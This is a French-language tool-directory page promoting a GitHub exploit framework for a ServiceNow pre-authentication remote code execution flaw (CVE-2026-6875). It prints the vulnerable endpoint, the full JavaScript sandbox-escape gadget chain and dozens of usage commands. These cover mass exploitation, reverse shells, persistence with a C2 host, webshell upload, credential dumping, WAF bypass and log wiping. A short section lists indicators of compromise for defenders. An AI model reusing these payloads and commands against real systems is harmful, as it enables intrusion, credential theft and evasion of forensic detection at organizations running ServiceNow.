Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-6875-PoC-Exploit — CVE-2026-6875 Framework RCE Pré-Auth ServiceNow 🔥 Injection JS → Évasion de sandbox → RCE → Root. Fonctionnalités : --detect, --exec, shell inverse/interactif, traitement par lots avec threads, contournement WAF, persistance, mouvement latéral, extraction d’identifiants, exécution sans fichier, nettoyage des traces. 🛡️ CVSS 9,5 activement exploité. Utilisation autorisée et légale uniquement. Restez légal. 🔒 | Kitploit
Outils/GitHubGitHub/tc4dy/cve-2026-6875-poc-exploit
Escalade de PrivilègesScanners de VulnérabilitésMécanismes de PersistanceExploitationMouvement LatéralExploitation d'Applications WebPost-ExploitationContournement de WAFTests d'Intrusion

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

CVE-2026-6875 Framework RCE Pré-Auth ServiceNow 🔥 Injection JS → Évasion de sandbox → RCE → Root. Fonctionnalités : --detect, --exec, shell inverse/interactif, traitement par lots avec threads, contournement WAF, persistance, mouvement latéral, extraction d’identifiants, exécution sans fichier, nettoyage des traces. 🛡️ CVSS 9,5 activement exploité. Utilisation autorisée et légale uniquement. Restez légal. 🔒

Outil d'Accès à Distance
GitHubtc4dy/cve-2026-6875-poc-exploit

CVE-2026-6875-PoC-Exploit

Voir le dépôt
39il y a 1 moisPas encore vérifié
Partager

CVE-2026-6875

CVE-2026-6875 - Framework d'exploitation RCE sans authentification ServiceNow & Vérificateur de PoC 🔥

CVE-2026-6875 CVSS 9.5 CISA KEV Python 3.6+

Pre-Auth RCE Sandbox Escape Privesc Windows Ready

ServiceNow AI Platform — Injection JavaScript → Évasion de sandbox → RCE → Élévation de privilèges root

Framework d'exploitation et Vérificateur sécurisé
Pour les tests de sécurité autorisés uniquement.


⚖️ Avertissement légal et utilisation responsable

Cet outil est fourni à des fins éducatives et de tests d'intrusion autorisés uniquement.

Les auteurs et contributeurs ne sont pas responsables de toute utilisation abusive ou des dommages causés par ce logiciel. Les utilisateurs sont seuls responsables de s'assurer qu'ils disposent d'une autorisation écrite explicite du propriétaire de la cible avant de tester. L'accès non autorisé aux systèmes informatiques est illégal en vertu du Computer Fraud and Abuse Act (CFAA) et des lois similaires dans le monde entier.

En utilisant ce logiciel, vous acceptez :

  • L'utiliser uniquement sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite de tester.
  • Respecter toutes les lois locales, étatiques et fédérales applicables.
  • Ne pas l'utiliser pour des activités malveillantes, destructrices ou illégales.

⚠️ AVERTISSEMENT : Cette vulnérabilité est activement exploitée dans la nature. Une utilisation non autorisée peut entraîner de graves conséquences juridiques.


🔥 Aperçu de la vulnérabilité

CVE-2026-6875 est une vulnérabilité critique d'exécution de code à distance sans authentification (RCE) dans la plateforme AI ServiceNow (anciennement Now Platform). Elle permet aux attaquants de contourner le sandbox des scripts et d'exécuter des commandes système arbitraires avec les privilèges de l'application ServiceNow.

Comment ça fonctionne :

  1. Injection JavaScript : Le point de terminaison assessment_thanks.do accepte un paramètre sysparm_assessable_type. En préfixant la valeur avec javascript:, un attaquant injecte du code JavaScript arbitraire.

  2. Évasion de sandbox : Un gadget sophistiqué d'évasion de sandbox (enchaînant DiscoveryFunctions.getCacheObjectForTable, AbstractAjaxProcessor et Class.create) lève la restriction du sandbox JavaScript.

  3. Exécution de code à distance : Le code Java injecté (via java.lang.Runtime.exec()) s'exécute avec les privilèges de l'application ServiceNow, permettant un compromis complet du système.

  4. Élévation de privilèges : Les modules post-exploitation tentent d'élever les privilèges à root via des mauvaises configurations sudo, des binaires SUID, des tâches cron modifiables ou des exploits du noyau.

Informations clés :


🛠️ Framework d'exploitation (exploit.py)

L'exploit complet armé enchaîne l'injection JavaScript et l'évasion de sandbox pour réaliser une exécution de code à distance, avec des modules post-exploitation avancés pour la persistance, le déplacement latéral et l'exfiltration de mots de passe.

✨ Fonctionnalités

Commandes du shell interactif


🕵️ Vérificateur sécurisé (verifier.py)

Le vérificateur sécurisé effectue une détection non intrusive de la vulnérabilité sans exécuter de charges utiles nuisibles ni apporter de modifications système.

✨ Fonctionnalités


📦 Installation & Prérequis

Prérequis

  • Python 3.6+
  • pip (pour la bibliothèque requests)

Installer les dépendances

root@kitploit:~
pip install requests urllib3

[!NOTE] exploit.py n'utilise que la bibliothèque standard pour les fonctionnalités principales ; requests n'est requis que pour la fonctionnalité --detect, les notifications --webhook et le vérificateur sécurisé.


🚀 Exemples d'utilisation

[1] Vérificateur sécurisé (verifier.py)

root@kitploit:~
# Single target verification
python verifier.py -u 192.168.1.100

# Custom port and path
python verifier.py -u 10.0.0.5 -p 8443 --path /snow

# Mass scan from file
python verifier.py -l targets.txt -o results.json

# Quiet mode (only vulnerable targets)
python verifier.py -u 192.168.1.100 -q

# Increase timeout for slow targets
python verifier.py -u servicenow.example.com --timeout 60

# Custom User-Agent
python verifier.py -u 192.168.1.100 --user-agent "MyScanner/1.0"

[2] Framework d'exploitation (exploit.py)

root@kitploit:~
# Interactive shell on target
python exploit.py -u 192.168.1.100

# Execute a single command
python exploit.py -u 192.168.1.100 --exec "id && whoami"

# Read a file
python exploit.py -u 192.168.1.100 --read-file /etc/passwd

# Enable detection before exploitation
python exploit.py -u 192.168.1.100 --detect

# Attempt root privilege escalation
python exploit.py -u 192.168.1.100 --privesc

# Upload a webshell
python exploit.py -u 192.168.1.100 --upload shell.jsp

# Install persistence with C2
python exploit.py -u 192.168.1.100 --persistence --c2-host 10.0.0.5 --c2-port 4444

# Clean tracks after exploit
python exploit.py -u 192.168.1.100 --clean

# Use fileless (memory) payload
python exploit.py -u 192.168.1.100 --fileless --c2-host 10.0.0.5 --c2-port 4444

# Mass exploit from file (50 threads)
python exploit.py -l targets.txt -m 50 --exec "uname -a"

# Custom callback server port
python exploit.py -u 192.168.1.100 --callback-port 9090

# Enable WAF bypass techniques
python exploit.py -u 192.168.1.100 --waf-bypass

# Send notifications via webhook
python exploit.py -u 192.168.1.100 --webhook https://myhook.com/snow

# Pipe mode (read command from stdin)
echo "cat /etc/hosts" | python exploit.py -u 192.168.1.100

# Custom port and path
python exploit.py -u 10.0.0.5 -p 8443 --path /snow

# Disable TLS verification (for self-signed certs)
python exploit.py -u 192.168.1.100 --insecure-tls

# Custom timeout and retries
python exploit.py -u 192.168.1.100 -t 60 -r 5 -d 2.0

🎯 Versions concernées

⚠️ Important : Les instances ServiceNow Cloud sont automatiquement patchées. Cette vulnérabilité affecte principalement les déploiements auto-hébergés.


🧠 Analyse technique approfondie

1. Injection JavaScript (CVE-2026-6875)

La vulnérabilité réside dans le point de terminaison assessment_thanks.do, qui accepte un paramètre sysparm_assessable_type. En fournissant une valeur commençant par javascript:, la plateforme évalue le JavaScript suivant dans le contexte système.

Point de terminaison vulnérable :

POST /assessment_thanks.do sysparm_assessable_type=javascript:gs.print('test')

2. Gadget d'évasion de sandbox

Le code injecté est initialement confiné dans un sandbox. Cependant, en exploitant la chaîne suivante :

root@kitploit:~
javascript:
var s="<payload>";
DiscoveryFunctions.getCacheObjectForTable=Object;
var a={};a.get=Object;
var b=new AbstractAjaxProcessor();
b.initialize=DiscoveryFunctions.getFirstValueFromTable(
  a,"",DiscoveryFunctions.getFirstValueFromTable(
    a,"",DiscoveryFunctions.getFirstValueFromTable(
      a,"",global,"WorkflowIconsSCR",""),"prototype",""),"initialize","");
b.a=Class.create();b.a(s);

Le sandbox est contourné, donnant un accès complet aux classes Java telles que java.lang.Runtime.

3. Modules post-exploitation

Exfiltration de mots de passe

Recherche des fichiers .properties, .xml, .conf pour les mots de passe, clés API et secrets :

  • /opt/ServiceNow/conf/*.xml
  • /var/log/ServiceNow/*.log
  • /etc/passwd, /etc/shadow

Persistance

Installe des portes dérobées via :

  • Linux : Tâches cron (*/5 * * * *), services systemd, clés SSH
  • Windows : Tâches planifiées (schtasks), clés de démarrage du Registre

Déplacement latéral

Scanne le sous-réseau local pour d'autres instances ServiceNow ou hôtes SSH, réutilise les mots de passe découverts.

Exécution sans fichier

Compile une classe Java à la volée, la charge via ClassLoader et l'exécute en mémoire (aucune écriture sur disque).

Techniques de contournement WAF

  1. Double encodage URL
  2. Commentaires JavaScript ({/*comment*/})
  3. Échappement Unicode (\u0077 pour w)
  4. Injection d'espaces
  5. Fractionnement de mots-clés (ne\u0077 pour new)
  6. Sélection aléatoire de technique

🔍 Indicateurs de compromission (IoCs)

Analyse des journaux

Recherchez dans vos journaux ServiceNow :

  • extraweb_access.log – requêtes vers /assessment_thanks.do avec sysparm_assessable_type contenant :
    • javascript:
    • Chaînes encodées en base64
    • DiscoveryFunctions.getCacheObjectForTable
    • AbstractAjaxProcessor

Système de fichiers

  • Fichiers inattendus dans /var/tmp/ (ex. shell.jsp, scripts .sh)
  • /etc/passwd, /etc/shadow ou ~/.ssh/authorized_keys modifiés
  • Nouvelles tâches cron (crontab -l)
  • Nouveaux services systemd (/etc/systemd/system/)

Processus

  • Processus suspects (/bin/bash -i, nc, curl, wget, python -c)
  • Connexions réseau inattendues vers des IP externes

Réseau

  • Connexions sortantes du serveur ServiceNow vers des IP non autorisées
  • Connexions de shell inverse sur des ports inhabituels

📚 Références

  • NVD - CVE-2026-6875
  • ServiceNow Security Advisory (KB3137947)
  • CISA KEV Catalog
  • Searchlight Cyber – Technical Write‑up
  • The Hacker News – ServiceNow Zero‑Day Exploited

🔗 Autres exploits

[+] CVE-2026-15409/15410 - SonicWall SMA1000 Multi-Exploit Framework
https://github.com/tc4dy/CVE-2026-15409-15410-Framework

[+] CVE-2026-41091 - SolarFlare (RedSun) Microsoft Defender LPE
https://github.com/tc4dy/CVE-2026-41091-PoC-Exploit

[+] CVE-2026-57821 - Apache Fineract SQL Injection Toolkit
https://github.com/tc4dy/CVE-2026-57821-PoC-Exploit

[+] CVE-2026-41940 - cPanel/WHM Authentication Bypass
https://github.com/tc4dy/CVE-2026-41940-PoC-Exploit

Télécharger l’outil
AttributValeur
📅 Découverte1er avril 2026 (Searchlight Cyber)
⚠️ Score CVSS9.5 (CRITIQUE)
📋 CISA KEVAjouté le 13 juillet 2026
🎯 Produits concernésPlateforme AI ServiceNow auto-hébergée
🔄 Versions corrigéesBrazil EA/GA, Australia Patch 2, Zurich Patch 7b/9, Yokohama Patch 12 Hot Fix 1b/13
🔓 AuthentificationNon requise (Pré-authentification)
🌍 Exploitation activeConfirmée dans la nature (juillet 2026)
FonctionnalitéDescription
🚀 Injection JavaScriptInjecte la charge utile via le paramètre sysparm_assessable_type.
💻 Évasion de sandboxContourne le sandbox des scripts ServiceNow pour exécuter du code Java arbitraire.
🔐 Shell interactifGénère un shell actif avec prise en charge de multiples commandes.
👑 Élévation rootVérifie les mauvaises configurations sudo, les binaires SUID et les tâches cron.
📁 Opérations sur fichiersTéléverse des webshells, lit/télécharge des fichiers via encodage base64.
🌐 Scan par lotExploite en masse plusieurs cibles avec du multithreading (drapeau -l).
🎯 Détection sécuriséeDrapeau facultatif --detect pour une vérification non intrusive de la vulnérabilité.
⚙️ Contournement WAFTechniques d'obfuscation intégrées pour contourner WAF/IDS (6 techniques).
🧩 PersistanceInstalle des portes dérobées cron/systemd/schtasks.
🔍 Déplacement latéralScanne le réseau local pour d'autres hôtes vulnérables et tente une propagation SSH/SSRF.
🧹 Nettoyage des tracesSupprime les journaux, l'historique bash et les pistes d'audit.
💾 Exécution sans fichierUtilise Java ClassLoader pour exécuter des charges utiles résidant en mémoire sans écriture sur disque.
🔌 Serveur de rappelServeur HTTP intégré pour recevoir la sortie des commandes (optionnel).
📢 Notifications WebhookEnvoie les résultats vers une URL personnalisée (Slack, Discord, etc.).
🪟 Multi-plateformePrend en charge les cibles Linux et Windows (cmd.exe / PowerShell).
🔒 Thread-safeUtilise des mécanismes de verrouillage pour les opérations concurrentes.
📊 Détection de versionDétecte la version de ServiceNow (Zurich/Brazil/Australia/Yokohama).
CommandeDescription
exec <cmd>Exécute une commande système
upload <local> [remote]Téléverse un webshell sur la cible
download <remote>Télécharge et affiche le contenu du fichier
privescTente une élévation de privilèges
reverse <host> <port>Envoie un shell inverse
dumpcredExfiltre les mots de passe des configurations ServiceNow
persist <host> <port>Installe une persistance (cron/systemd/schtasks)
lateralTente un déplacement latéral
cleanNettoie les traces (journaux, historique)
memory <host> <port>Exécute une charge utile Java sans fichier
exitQuitte le shell interactif
FonctionnalitéDescription
🔍 Détection ServiceNowIdentifie les instances ServiceNow via plusieurs points de terminaison.
📊 Détection de versionDétecte les versions spécifiques de ServiceNow et les niveaux de patch.
🧪 Test d'injection JavaScriptTeste la vulnérabilité d'injection en utilisant des charges utiles sûres gs.print().
🔒 Test d'évasion de sandboxVérifie l'évasion de sandbox sans commandes destructrices.
📈 Score de confianceFournit un pourcentage de confiance (85‑95 %) basé sur les preuves.
📋 Sortie JSONExporte les résultats au format JSON pour les rapports.
🔄 Scan de masseScanne plusieurs cibles avec support du multithreading.
🎯 Non intrusifExécute uniquement uname -a bénin pour les informations système.
Version ServiceNowVersions vulnérablesVersions corrigées
BrazilEA, GAPatché (post‑GA)
AustraliaAvant Patch 2Patch 2+
ZurichAvant Patch 7b, Patch 9Patch 7b, Patch 9+
YokohamaAvant Patch 12 Hot Fix 1bPatch 12 Hot Fix 1b, Patch 13
Autres versionsInconnuConsultez l'avis officiel